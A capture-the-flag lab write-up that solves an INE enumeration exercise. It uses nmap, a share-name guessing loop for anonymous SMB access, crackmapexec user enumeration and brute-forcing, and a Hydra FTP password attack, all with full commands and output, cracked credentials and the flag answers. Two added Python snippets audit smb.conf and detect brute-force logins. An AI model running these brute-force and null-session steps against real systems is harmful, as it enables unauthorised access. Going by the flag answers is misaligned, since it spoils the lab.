Enumeration CTF 1
Overview
This lab focuses on enumeration techniques to identify and analyze running services on a target Linux machine. The goal is to explore and interact with the machine's services to uncover and capture hidden flags. Participants will apply their knowledge of network and system enumeration to identify misconfigurations, weak credentials, and potential security vulnerabilities.
A Linux machine is accessible at target.ine.local. Identify the services running on the machine and capture the flags. The flag is in MD5 hash format.
Flag 1: There is a Samba share that allows anonymous access. Wonder what's in there!
Flag 2: One of the Samba users has a weak password. Their private share with the same name as their username is at risk!
Flag 3: Follow the hint given in the previous flag to uncover this one.
Flag 4: This is a warning meant to deter unauthorized users from logging in.
Note: The wordlists located in the following directory will be useful:
/root/Desktop/wordlists
Writeup
Flag 1
Let's start with a classic nmap scan.
┌──(root㉿INE)-[~]
└─# nmap -p- target.ine.local --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 18:43 IST
Nmap scan report for target.ine.local (192.117.124.3)
Host is up (0.000024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5554/tcp open sgi-esphttp
MAC Address: 02:42:C0:75:7C:03 (Unknown)
┌──(root㉿INE)-[~]
└─# nmap -p 22,139,445,5554 target.ine.local -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 18:44 IST
Nmap scan report for target.ine.local (192.117.124.3)
Host is up (0.000043s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bb:ca:49:7e:f5:5c:6e:bf:8a:55:a1:69:d9:c9:18:01 (RSA)
| 256 da:06:c1:ab:e7:6f:14:b9:50:d5:43:a7:47:ab:80:ce (ECDSA)
|_ 256 a1:5c:ab:22:6b:c2:f1:5c:5a:7a:5a:d8:e7:81:e2:33 (ED25519)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
5554/tcp open ftp vsftpd 2.0.8 or later
MAC Address: 02:42:C0:75:7C:03 (Unknown)
Service Info: Host: blah; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-04-02T13:14:27
|_ start_date: N/A
|_nbstat: NetBIOS name: TARGET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.05 seconds
The instructions say that the SMB service can be accessed with a NULL session. Let's verify.
┌──(root㉿INE)-[~]
└─# smbclient -N -L //target.ine.local
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (target server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server target.ine.local (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
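The anonymous listing shows no usable share, so try the share names from the provided wordlist with a small script.
#!/bin/bash
# Try an anonymous (NULL session) connection to every candidate share name.
# Uses $target from the environment, falling back to the lab hostname.
target="${target:-target.ine.local}"
for share in $(cat wordlists/shares.txt); do
    echo "Trying $share"
    smbclient -N "//$target/$share"
done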
Run the script and gain NULL access to a share.
...existing code...
Trying commonsfiles
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
Trying pubfiles
Try "help" to get a list of possible commands.
smb: \>
Check the content of the share and capture the flag.
smb: \> get flag1.txt
getting file \flag1.txt of size 40 as flag1.txt (19.5 KiloBytes/sec) (average 19.5 KiloBytes/sec)
smb: \> ^C
┌──(root㉿INE)-[~/Desktop]
└─# cat flag1.txt
FLAG1{37af3ea4010847989d9db9550c1ed9d8}
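The share was absent from the `smbclient -L` listing yet still accepted a NULL session, which is what a hidden guest share looks like from the server side. The following audit of an smb.conf for that pattern is an added example, not part of the original writeup; the configuration text is constructed and the function names are hypothetical.

```python
import re

# Constructed smb.conf modelled on the lab: a guest share hidden from listings.
SAMPLE_SMB_CONF = """
[global]
   map to guest = Bad User

[pubfiles]
   browseable = no
   # "public" is a synonym of "guest ok"
   public = yes
   read only = yes

[josh]
   valid users = josh
   guest ok = no
"""

SYNONYMS = {"public": "guestok", "browsable": "browseable"}
TRUE = {"yes", "true", "on", "1"}

def parse_smb_conf(text):
    """Return {section: {param: value}}; Samba ignores case and spaces in names."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = sections.setdefault(header.group(1).strip().lower(), {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            key = re.sub(r"\s+", "", key).lower()
            current[SYNONYMS.get(key, key)] = value.strip().lower()
    return sections

def audit_guest_shares(text):
    """List shares reachable without credentials (only 'read only' is checked for writes)."""
    findings = []
    for name, p in parse_smb_conf(text).items():
        if name == "global" or p.get("guestok", "no") not in TRUE:
            continue
        findings.append({
            "share": name,
            "hidden_from_listing": p.get("browseable", "yes") not in TRUE,
            "guest_writable": p.get("readonly", "yes") not in TRUE,
        })
    return findings
```

A finding with `hidden_from_listing` set is a share whose only protection is its name, which a wordlist defeats.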
Flag 2
The hint for flag two says there is a user with a weak password who has a share with the same name. Let's enumerate users with crackmapexec.
┌──(root㉿INE)-[~/Desktop]
└─# crackmapexec smb $target --users
SMB target.ine.local 445 TARGET [*] Windows 6.1 Build 0 (name:TARGET) (domain:ine.local) (signing:False) (SMBv1:False)
SMB target.ine.local 445 TARGET [-] Error enumerating domain users using dc ip target.ine.local: socket connection error while opening: [Errno 111] Connection refused
SMB target.ine.local 445 TARGET [*] Trying with SAMRPC protocol
SMB target.ine.local 445 TARGET [+] Enumerated domain user(s)
SMB target.ine.local 445 TARGET ine.local\josh
SMB target.ine.local 445 TARGET ine.local\nancy
SMB target.ine.local 445 TARGET ine.local\bob
SMB target.ine.local 445 TARGET [+] Enumerated domain user(s)
SMB target.ine.local 445 TARGET ine.local\josh
SMB target.ine.local 445 TARGET ine.local\nancy
SMB target.ine.local 445 TARGET ine.local\bob
Save the users in a file.
┌──(root㉿INE)-[~/Desktop]
└─# cat cme.txt | grep " ine.local" | cut -d "\\" -f2
josh
nancy
bob
josh
nancy
bob
┌──(root㉿INE)-[~/Desktop]
└─# cat cme.txt | grep " ine.local" | cut -d "\\" -f2 > users.txt
Brute-force the passwords with crackmapexec and the password list provided.
┌──(root㉿INE)-[~/Desktop]
└─# crackmapexec smb $target -u users.txt -p wordlists/unix_passwords.txt
SMB target.ine.local 445 TARGET [*] Windows 6.1 Build 0 (name:TARGET) (domain:ine.local) (signing:False) (SMBv1:False)
SMB target.ine.local 445 TARGET [-] ine.local\josh:admin STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:123456 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:12345 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:123456789 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:password STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:iloveyou STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:princess STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:1234567 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:12345678 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:abc123 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:nicole STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:daniel STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:babygirl STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:monkey STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:lovely STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:jessica STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:654321 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:michael STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:ashley STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:qwerty STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:111111 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:iloveu STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:000000 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:michelle STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:tigger STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:sunshine STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:chocolate STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:password1 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:soccer STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:anthony STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:friends STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:butterfly STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [+] ine.local\josh:purple
The valid credentials are josh:purple. Connect to his share.
┌──(root㉿INE)-[~/Desktop]
└─# smbclient //$target/josh -U josh
Password for [WORKGROUP\josh]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 2 18:37:22 2025
.. D 0 Tue Nov 19 10:44:41 2024
flag2.txt N 119 Wed Apr 2 18:37:22 2025
1981311780 blocks of size 1024. 87557272 blocks available
smb: \> get flag2.txt
getting file \flag2.txt of size 119 as flag2.txt (58.1 KiloBytes/sec) (average 58.1 KiloBytes/sec)
smb: \> exit
┌──(root㉿INE)-[~/Desktop]
└─# cat flag2.txt
FLAG2{3cddd08267af46db87ab3eacab0b5388}
Psst! I heard there is an FTP service running. Find it and check the banner.
Flag 3
Follow the hint and check the FTP banner. From the initial nmap scan, we see an FTP service on port 5554.
┌──(root㉿INE)-[~/Desktop]
└─# ftp $target -p 5554
Connected to target.ine.local.
220 Welcome to blah FTP service. Reminder to users, specifically ashley, alice and amanda to change their weak passwords immediately!!!
Name (target.ine.local:root):
The hint tells you there are three users: ashley, alice and amanda (saved in users.txt). Let's bruteforce their passwords using Hydra.
┌──(root㉿INE)-[~/Desktop]
└─# hydra -L users.txt -P wordlists/unix_passwords.txt ftp://$target:5554
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-02 19:21:10
[DATA] max 16 tasks per 1 server, overall 16 tasks, 3027 login tries (l:3/p:1009), ~190 tries per task
[DATA] attacking ftp://target.ine.local:5554/
[STATUS] 304.00 tries/min, 304 tries in 00:01h, 2723 to do in 00:09h, 16 active
[STATUS] 304.00 tries/min, 912 tries in 00:03h, 2115 to do in 00:07h, 16 active
[5554][ftp] host: target.ine.local login: alice password: pretty
[STATUS] 430.00 tries/min, 3010 tries in 00:07h, 17 to do in 00:01h, 16 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-02 19:28:17
Hydra finds the credentials alice:pretty. Connect to FTP using the credentials.
┌──(root㉿INE)-[~/Desktop]
└─# ftp $target 5554
Connected to target.ine.local.
220 Welcome to blah FTP service. Reminder to users, specifically ashley, alice and amanda to change their weak passwords immediately!!!
Name (target.ine.local:root): alice
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||35581|)
150 Here comes the directory listing.
-rw-rw-r-- 1 0 0 40 Apr 02 13:07 flag3.txt
226 Directory send OK.
ftp> get flag3.txt
local: flag3.txt remote: flag3.txt
229 Entering Extended Passive Mode (|||25136|)
150 Opening BINARY mode data connection for flag3.txt (40 bytes).
100% |********| 40 685.30 KiB/s 00:00 ETA
226 Transfer complete.
40 bytes received in 00:00 (117.30 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿INE)-[~/Desktop]
└─# cat flag3.txt
FLAG3{8e58cfb8d2784d97a4c612bb613594a9}
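On the server, the Hydra run above appears as a burst of failed logins from one client followed by a success. The detector below for that pattern is an added example, not part of the original writeup; the log lines are constructed in the style of vsftpd's login log, and the threshold, window and function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]{8} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def make_sample_log():
    """Constructed vsftpd-style lines: 12 failed guesses, one hit, one benign typo."""
    start = datetime(2025, 4, 2, 19, 21, 10)
    fmt = '{:%a %b %d %H:%M:%S %Y} [pid {}] [{}] {} LOGIN: Client "{}"'
    names = ("ashley", "alice", "amanda")
    lines = [fmt.format(start + timedelta(seconds=2 * i), 4000 + i, names[i % 3],
                        "FAIL", "192.0.2.10") for i in range(12)]
    lines.append(fmt.format(start + timedelta(seconds=30), 4012, "alice", "OK", "192.0.2.10"))
    lines.append(fmt.format(start + timedelta(seconds=40), 4013, "bob", "FAIL", "198.51.100.7"))
    lines.append(fmt.format(start + timedelta(seconds=50), 4014, "bob", "OK", "198.51.100.7"))
    return lines

def detect_bruteforce(lines, threshold=10, window=timedelta(minutes=5)):
    """Alert per client IP on >= threshold failures inside the window; a later
    success from an alerted IP marks that account as likely guessed."""
    fails = defaultdict(list)   # ip -> [(timestamp, user)] still inside the window
    alerts = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"]
        recent = [(t, u) for t, u in fails[ip] if ts - t <= window]
        if m["result"] == "FAIL":
            recent.append((ts, user))
            if len(recent) >= threshold:
                alert = alerts.setdefault(ip, {"failures": 0, "users": set(), "compromised": set()})
                alert["failures"] = max(alert["failures"], len(recent))
                alert["users"] |= {u for _, u in recent}
        elif ip in alerts:
            alerts[ip]["compromised"].add(user)
        fails[ip] = recent
    return alerts
```

Accounts listed under `compromised` need a password reset; the alerting source is a candidate for rate limiting or blocking.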
Flag 4
The hint for this flag describes a warning message for unauthorized access, which is often present when connecting to the SSH service.
┌──(root㉿INE)-[~/Desktop]
└─# ssh alice@$target
The authenticity of host 'target.ine.local (192.117.124.3)' can't be established.
ED25519 key fingerprint is SHA256:qWHJnmTFgrmLKFbmMNRLIr1Y8MVWpqGGxhJ5miFHgnQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'target.ine.local' (ED25519) to the list of known hosts.
********************************************************************
* *
* WARNING: Unauthorized access to this system *
* is strictly prohibited and may be subject to *
* criminal prosecution. *
* *
* This system is for authorized users only. *
* All activities on this system are monitored *
* and recorded. *
* *
* By accessing this system, you consent to *
* such monitoring and recording. *
* *
* If you are not an authorized user, *
* disconnect immediately. *
* *
********************************************************************
* *
* Is this what you're looking for?: FLAG4{a2c98bf3b1424c79bb331b44ec4c85f9} *
* *
********************************************************************
alice@target.ine.local's password: